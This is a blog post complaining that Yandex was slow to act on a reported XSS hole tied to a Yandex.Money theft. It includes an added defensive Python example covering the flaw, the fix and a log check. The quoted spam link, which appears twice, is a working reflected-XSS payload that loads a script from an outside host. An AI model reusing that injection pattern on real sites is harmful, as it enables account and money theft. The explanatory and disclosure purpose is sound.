Inspired by yesterday's topic.
How did you take my money from the Yandex wallet? Part 3. XSS
A small preface for those who did not read that post. A man had money stolen from his Yandex.Money wallet. Working through the whole unpleasant story, he concluded that Yandex is not omnipotent and that there is a wonderful XSS on its site.
After reading it I was, to put it mildly, a little surprised, but not because a working XSS had turned up at a company as big as Yandex... no, not that. I was surprised because I had personally informed the company about this hole 20 days earlier and had been told that measures would be taken ASAP.
The link to the hostile script was 100% the same.
My letter to Yandex read:
SUBJ: Looks like an XSS hole on your site
Good evening.
Spam just arrived in my mailbox, and when I clicked the link inside the letter I found code of this type:
src='http://passport.yandex.ru/passport?mode=mycookie&submode=choice&retpath=http://slovari.yandex.ru/%22%3CSCRIPT type=text/javascript src=http://httpz.ru/zakazchikgo.js>'
It all looks like an active XSS - I have not checked it myself, but judging by the structure it looks like one.)
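The URL in the letter above shows the whole mechanism: the payload sits in the retpath query parameter, and a page that echoes that parameter into its HTML without encoding turns a harmless-looking redirect into script injection. The following is an added illustration, not Yandex's code and not anything from the original post; the page layout, the function names and the allowlist of redirect hosts are assumptions made for the example. It reconstructs the parameter as a server would see it, shows the broken echo pattern beside a hardened one, and includes a small check that can flag such values in request logs.

```python
"""Added example: how a redirect parameter such as ``retpath`` becomes a
reflected XSS sink, and how output encoding plus an allowlist close it.
Not Yandex's code; layout, names and ALLOWED_HOSTS are assumptions."""
from html import escape
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed from the link quoted in the letter above. The percent-encoded
# %22%3C decodes to '"<', so the parameter carries a quote plus a <SCRIPT tag.
SPAM_URL = (
    "http://passport.yandex.ru/passport?mode=mycookie&submode=choice"
    "&retpath=http://slovari.yandex.ru/%22%3CSCRIPT type=text/javascript "
    "src=http://httpz.ru/zakazchikgo.js>"
)

# Hosts a redirect is allowed to point at (an assumption for this example).
ALLOWED_HOSTS = {"slovari.yandex.ru", "mail.yandex.ru"}
DEFAULT_TARGET = "https://www.yandex.ru/"


def retpath_of(url: str) -> str:
    """Return the decoded retpath parameter exactly as a server-side
    framework would hand it to page code (percent-decoding applied)."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("retpath", [""])[0]


def render_vulnerable(retpath: str) -> str:
    """The broken pattern: the decoded parameter is interpolated into the
    page verbatim, so the embedded <SCRIPT tag lands in the markup."""
    return f"<p>You will be redirected to {retpath}</p>"


def render_safe(retpath: str) -> str:
    """Hardened pattern, two layers deep:
    1. only http(s) URLs on allowlisted hosts survive as redirect targets;
    2. whatever survives is HTML-escaped before interpolation.
    Layer 1 alone does NOT stop the payload above (its host is allowed);
    layer 2 is what neutralises the quote and the tag."""
    parts = urlsplit(retpath)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        retpath = DEFAULT_TARGET
    safe = escape(retpath, quote=True)
    return f'<p>You will be redirected to <a href="{safe}">{safe}</a></p>'


def looks_injected(raw_retpath: str) -> bool:
    """Log-review helper: a redirect target has no business containing
    markup characters once decoded. Useful for flagging requests or
    phishing links during triage."""
    decoded = unquote(raw_retpath)
    return any(ch in decoded for ch in '<>"\'')


if __name__ == "__main__":
    rp = retpath_of(SPAM_URL)
    print("vulnerable:", render_vulnerable(rp))
    print("hardened:  ", render_safe(rp))
    print("flagged:   ", looks_injected(rp))
```

Running the module prints the vulnerable rendering with a live `<SCRIPT` tag, the hardened rendering with `&lt;SCRIPT`, and `True` from the triage check. The point worth keeping is that an allowlist of redirect hosts is not a substitute for encoding: the spam link pointed at a legitimate Yandex host, so only contextual output encoding defeats it.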
After 2 DAYS, I get a reply from Yandex.
We did not conduct such mailings and have nothing to do with this action.
These are scammers who are trying to lure money out of you or take possession of your registration data. Please forward this scam letter to us using the "Forward" button. Do not forget to tick the box "Add original letter as an attachment".
For those who do not know, this is the template excuse that Yandex sends to everyone who complains about spam.
I wrote to them again and asked them to open their eyes. The answer was already more adequate:
Hello, Roman!
Sorry, I did not quite understand you, and I want to apologize right away for taking two days to respond.
This code has been transferred to the security service. They will take action.
Thank you for your letter.
This correspondence dates back to October 20th. Ticket number: #200910199001067
Forgive me, but for a company that manages other people's money (I mean Yandex.Money), this attitude to security matters is simply unacceptable.
PS Separately, I want to say that despite everything I personally respect Yandex, because continuing to develop actively in a market where 95% of similar companies worldwide have already faded into oblivion really does deserve respect.